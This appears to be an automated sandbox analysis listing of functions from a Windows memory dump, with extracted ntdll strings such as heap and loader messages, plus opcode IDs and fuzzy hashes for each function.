Function 34E4A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 34EAC075
\??\, xrefs: 34EABF73
UseFilter, xrefs: 34E4A171

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: fd59acba92b401b47a42b9afb2c9a44868aabb74107ace2bf07084f4e9934bbb
Instruction ID: 4b4f25311c916d0b85c791afb2dc0dd3039368a1e191e5b49c34c90f4f906747
Opcode Fuzzy Hash: fd59acba92b401b47a42b9afb2c9a44868aabb74107ace2bf07084f4e9934bbb
Instruction Fuzzy Hash: 36A17F769112299FEB31DF28CC88BDAB7B8EF44714F1045EAE908AB250D7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 34F2B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

TargetNtPath, xrefs: 34F2B3AF
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 34F2B3AA
GlobalizationUserSettings, xrefs: 34F2B3B4

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: d092d89da9c2e8fb1de48845c0ee78ea234ba7f36296a5b29e83293ee1ab9983
Instruction ID: 5182d3dc6a30af9f130592eb6252379c550e6eb57e89501b1ffcbd84840ed899
Opcode Fuzzy Hash: d092d89da9c2e8fb1de48845c0ee78ea234ba7f36296a5b29e83293ee1ab9983
Instruction Fuzzy Hash: 21619176D41629AFDB31DF54DC88B9AB7B8EB04710F4505E9E908AB290CB34DE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34E4F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34EAE442
HEAP[%wZ]: , xrefs: 34EAE435
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 34EAE455

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: e6e390a6237e5a52ef65ab38f8edcc4e1ff719734845c678f382be415a8df82e
Instruction ID: da1189ad4f9e5eafbb326af2eb3abe9021eafcb29f30c198934baa245307ff0d
Opcode Fuzzy Hash: e6e390a6237e5a52ef65ab38f8edcc4e1ff719734845c678f382be415a8df82e
Instruction Fuzzy Hash: C251F135B50784EFF712CBA8D984B6ABBF8EF04B58F0444A4E5548B792D778E904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 34E71514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 34EBA39D
minkernel\ntdll\ldrmap.c, xrefs: 34EBA3A7
Could not validate the crypto signature for DLL %wZ, xrefs: 34EBA396

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: c7a0d3e220a0eae0de6f0b4a9fbc232ab764605a8768f0ce88c37f68b73d0cf1
Instruction ID: 151a367abb0a89bf28d89b63ef57558ee39ab4bbc1ce0b0fbfa4e49a27286636
Opcode Fuzzy Hash: c7a0d3e220a0eae0de6f0b4a9fbc232ab764605a8768f0ce88c37f68b73d0cf1
Instruction Fuzzy Hash: 9951C278A14741DFEB15CB68C944B1ABFA4FF00768F140698E9929B7E2DB74E940CB40

Uniqueness

Uniqueness Score: -1.00%

Function 34EFD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34EFD79F
HEAP[%wZ]: , xrefs: 34EFD792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 34EFD7B2

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 2cbf850f904a9a1ef99c2046c398b29c6bce4e3f3bad2a00305e1f7d4f8b989c
Instruction ID: 41b4ec3544eb4c5721ca54b86d703739bf417d87d137ea5764b7dfa737aa7424
Opcode Fuzzy Hash: 2cbf850f904a9a1ef99c2046c398b29c6bce4e3f3bad2a00305e1f7d4f8b989c
Instruction Fuzzy Hash: 2351E179200B508EF3518AA9CC40F727BE5DF45288F538C9DE4C68F2C1DA27D846DB60

Uniqueness

Uniqueness Score: -1.00%

Function 34E4753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34EAAD47
HEAP[%wZ]: , xrefs: 34EAAD3A
Invalid address specified to %s( %p, %p ), xrefs: 34EAAD5A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: b73f6825181a9ac4b2d5eea8da0812529b180a1b6faedca7d45ac50ca0a989ed
Instruction ID: b8e1c681d0fbde3caa32a41a02328f16aa0116f57736479d25e4b78711001319
Opcode Fuzzy Hash: b73f6825181a9ac4b2d5eea8da0812529b180a1b6faedca7d45ac50ca0a989ed
Instruction Fuzzy Hash: C94122786003808FFB15DF28E480BA577A1DF0134DF6448EDD4868F756CBA4E886DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 34E815EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 34EC1954
LdrpAllocateTls, xrefs: 34EC194A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34EC1943

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: bd5b54af76598ddf0e2f414e3ce3a3eb82e2d0b2d057bb968829fff780d8504e
Instruction ID: a28b2d48965b7a14cc269cf106d632db692d8b64839839d794c6149ce8be4bb0
Opcode Fuzzy Hash: bd5b54af76598ddf0e2f414e3ce3a3eb82e2d0b2d057bb968829fff780d8504e
Instruction Fuzzy Hash: B14168B9A10205EFEB15CFA8D941BAEFBB5FF48304F448569E406A7350DB35A801CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34E5A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

@S4, xrefs: 34E5A268
RtlpResUltimateFallbackInfo Enter, xrefs: 34E5A21B
RtlpResUltimateFallbackInfo Exit, xrefs: 34E5A229

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @S4$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-3705842070
Opcode ID: 92b26de7e535472706fb506586af03be4c45b63e656d019c6bad84132957cb93
Instruction ID: 086ab2bc74207cfab200739da5764e2481d7b730e2d55c80fa2974fa91678985
Opcode Fuzzy Hash: 92b26de7e535472706fb506586af03be4c45b63e656d019c6bad84132957cb93
Instruction Fuzzy Hash: 7341ED78B04704DFEB05CF99E855B5A77B8EF45748F1080E9E944DB2A1E636C900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 34E81527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 34EC185B
DLL "%wZ" has TLS information at %p, xrefs: 34EC184A
LdrpInitializeTls, xrefs: 34EC1851

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 83fff4060ddf98ddcd2bfa8e3cb59ce1e70caf0f2aa2193a47e826d8bfe93816
Instruction ID: df5cb48a91cc85739220dde2ad354e1e9f857ffd67aefb930c7cc8d0ae4d5f33
Opcode Fuzzy Hash: 83fff4060ddf98ddcd2bfa8e3cb59ce1e70caf0f2aa2193a47e826d8bfe93816
Instruction Fuzzy Hash: 0931C279E10200EFFB109B54DD85F6AB7A8EB50B98F090569E60AB7280DF70ED458B90

Uniqueness

Uniqueness Score: -1.00%

Function 34ED85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 34ED85DE

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 661ea549f98329e02cf75e136f0e67b879a338ebf18dfdc1a8192d0ff1982eda
Instruction ID: 7337ae842dc4dad49df7d223690e234bcf145fc5fb53dda289785a544ff3215f
Opcode Fuzzy Hash: 661ea549f98329e02cf75e136f0e67b879a338ebf18dfdc1a8192d0ff1982eda
Instruction Fuzzy Hash: 3A01F735610300DFE7255B60DD44F6A3B65FF42278F481D9DE52117A72CF20A883CE98

Uniqueness

Uniqueness Score: -1.00%

Function 34E651C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 34E65365
@, xrefs: 34E654C3

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 79a138f81b530af8bd8fc3e485e54fae9b4c8df402661f85930a021896838652
Instruction ID: 54628a06bbab802f969509901b49216e09b52d50945157ee9d4d926595573316
Opcode Fuzzy Hash: 79a138f81b530af8bd8fc3e485e54fae9b4c8df402661f85930a021896838652
Instruction Fuzzy Hash: AF329FB46483518FDB54CF14D480B2EB7E6EF88748F50492EF9E69B2A0E738D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 34E55622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34E55698
RtlDebugPrintTimes.NTDLL ref: 34EB061D

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 49c0dc8eee535ae5ab6de3e554bc00a4601b40aafe8bbb6e5b7436f27f641bd8
Instruction ID: 4474c7c4849c67706e2a38c7e2fb4690b655f124c260161f6e599a137681c88b
Opcode Fuzzy Hash: 49c0dc8eee535ae5ab6de3e554bc00a4601b40aafe8bbb6e5b7436f27f641bd8
Instruction Fuzzy Hash: FA31D234305B02EFEB859B64C940E8AFBA9FF44798F044595E91157E64DBB0F821CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 34ED174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

AddD, xrefs: 34ED18CD
@, xrefs: 34ED1877

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: d167a957493144cba64b7afb8e0a3ea3085ab4f9cee3746a4824b82c774982bf
Instruction ID: 4cef3aa554ca4b428c23ce98232dcb2fe77e50145956a76f7dd67e8e4cb435b1
Opcode Fuzzy Hash: d167a957493144cba64b7afb8e0a3ea3085ab4f9cee3746a4824b82c774982bf
Instruction Fuzzy Hash: 06A18ABA508300AFE314CB14C844BABF7E9FF85754F544A2EF99486294E770E906CB62

Uniqueness

Uniqueness Score: -1.00%

Function 34F2B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 34F2B5C4
RedirectedKey, xrefs: 34F2B60E

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: be9e0e066a67ad3b395d5ed00753cd49a0b0496da3c7a107467eaeccc417e62c
Instruction ID: 6ed66b780973b4062b0fb86741ddc6056de5b77304ab9b8931964f12acd596ad
Opcode Fuzzy Hash: be9e0e066a67ad3b395d5ed00753cd49a0b0496da3c7a107467eaeccc417e62c
Instruction Fuzzy Hash: 966115B9C01219EFDB11DF94C888ADEBFB8FB08711F54446AE805A7240DB359A46DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 34E6F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 34E6F716
$, xrefs: 34E6F780

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 94ef81d438e0a6e8df2edef1050d72fb8816e64771629b69b6dcf407d2d5d8a6
Instruction ID: 0da1baa09e96d007ff6a2bf5bf55b806505b823d15a54ea70a256e29d740eed8
Opcode Fuzzy Hash: 94ef81d438e0a6e8df2edef1050d72fb8816e64771629b69b6dcf407d2d5d8a6
Instruction Fuzzy Hash: 3061ADB5A90749CFEB21CFA4C580B9DBBB1FF4470CF1044A9D51AAB691CB78B941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 34EE314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 34EE317C
LdrResGetRCConfig Exit, xrefs: 34EE318E

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: db236571c86e66327ff4e77a4392f2111b7948ba9d22d8bbcea1a9534ef19be2
Instruction ID: 2bc88da3a4a685de5aae59c749743f36435b938c13e8e7073ca705c509ecf6e2
Opcode Fuzzy Hash: db236571c86e66327ff4e77a4392f2111b7948ba9d22d8bbcea1a9534ef19be2
Instruction Fuzzy Hash: AC310275218741DFE311CB68E840B2AB7E8EF89758F0418ADF894CB381EB35D945C752

Uniqueness

Uniqueness Score: -1.00%

Function 34E506CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

4, xrefs: 34E50733
4, xrefs: 34E50739

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: 4$ 4
API String ID: 0-3757094618
Opcode ID: 9a24bcdd759d0fb35413e649f2ed8875ecdc3efee319a0bfb61f816d7925add0
Instruction ID: a107f00b0558a1d7654d954c8a0f058d7cf0917f4f4714498c6280d1c99889ed
Opcode Fuzzy Hash: 9a24bcdd759d0fb35413e649f2ed8875ecdc3efee319a0bfb61f816d7925add0
Instruction Fuzzy Hash: AC31D136A047119FE712EF28C880E5B7BA9EF842A1F0545A9FC559B320EF30CC058FA1

Uniqueness

Uniqueness Score: -1.00%

Function 34E831BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 34E8322D
.Local\, xrefs: 34E831D5

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 089a2dc144db66db4b5b37a7c4f6873d8f120dc56582cebebf3037183017688a
Instruction ID: 2416b4f85722961bdb8f6cccce91f8d11b77d5a9f7729cf82dcf392109479610
Opcode Fuzzy Hash: 089a2dc144db66db4b5b37a7c4f6873d8f120dc56582cebebf3037183017688a
Instruction Fuzzy Hash: 683192B1549301DFE710CF28C980A5BBBE8EB85B54F40092EF99C83250D635DD048B92

Uniqueness

Uniqueness Score: -1.00%

Function 34E8A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 34E8A509
Cleanup Group, xrefs: 34E8A504

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 57f867582349b2918e6a1a871025d0cfba125845da40960944aefe5a130b12ad
Instruction ID: c1ce7b86e7d7e38da04c3f0c6b38985faebdd24135892f5a3c17aea2420192ef
Opcode Fuzzy Hash: 57f867582349b2918e6a1a871025d0cfba125845da40960944aefe5a130b12ad
Instruction Fuzzy Hash: 7E01F4B2514700EFE751DF14CE05B1277E8E740B15F048979E55CCB590E738D944CB89

Uniqueness

Uniqueness Score: -1.00%

Function 34E5C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 34E5C7E3, 34E5C960

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f5caf69a57c3289ac5c2fd97dbf4abe7521cdba751444c070a95b06760536a26
Instruction ID: 5630b52ee0f4dc5e9b8213683bcfc043151c2d3785181b01e421eabf93727df4
Opcode Fuzzy Hash: f5caf69a57c3289ac5c2fd97dbf4abe7521cdba751444c070a95b06760536a26
Instruction Fuzzy Hash: F4824C79E003189FEB14CFA9C990BADB7B5FF48354F1081A9E859AB260DB34D985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 34E564F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c736f0634d2c56f3a684d512db314ed1a88f594a04c4ccf22256077aaad36bbc
Instruction ID: c54c16b7f7f94631713f49375c1d21b672ff50735d815d56d4d6cafa77fa7b5c
Opcode Fuzzy Hash: c736f0634d2c56f3a684d512db314ed1a88f594a04c4ccf22256077aaad36bbc
Instruction Fuzzy Hash: 4CE18C75608342CFD704CF28C090A5ABBE1FF88358F458AADE99987361DB71E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 34E7E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7945d0b945fc02505717b8cd4550a2bb6171251b7d9aebc9409ad2eb8362ad2e
Instruction ID: 355e38586ba1e0029c98286e2c58a70e02affa5879e1ca9b4b1c705561722229
Opcode Fuzzy Hash: 7945d0b945fc02505717b8cd4550a2bb6171251b7d9aebc9409ad2eb8362ad2e
Instruction Fuzzy Hash: 35A1D171E04319EFFF11CBE8C884B9EBBA4AF05B68F050565E990AB290DB749D05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 34E51051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34E51153

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0e15baaaa8260f3496020286e77e77ca27300599600d1aa58f4ccf1ee71cde46
Instruction ID: 092bfb526ce2567e07072144432490396fed49b82121ff8995f91f8e3573a907
Opcode Fuzzy Hash: 0e15baaaa8260f3496020286e77e77ca27300599600d1aa58f4ccf1ee71cde46
Instruction Fuzzy Hash: 43B103B5A093408FD354CF28C580A5AFBF1BF88308F544AAEE899CB352D735E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 34E57623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde0cc787b2cd510f5242b2fbef0ebb509c47d2f105402e24d123e550e321152
Instruction ID: 70a36c11abd1e6bc5faaf91725b4e8d00c5d4b4db9734d49f6c273eaf3b2d3d5
Opcode Fuzzy Hash: bde0cc787b2cd510f5242b2fbef0ebb509c47d2f105402e24d123e550e321152
Instruction Fuzzy Hash: 0F618275A00606EFEB08DF78D480A9DFBB5FF88344F2485AAD419A7310DB74A9519BD0

Uniqueness

Uniqueness Score: -1.00%

Function 34E5254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34E52630

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
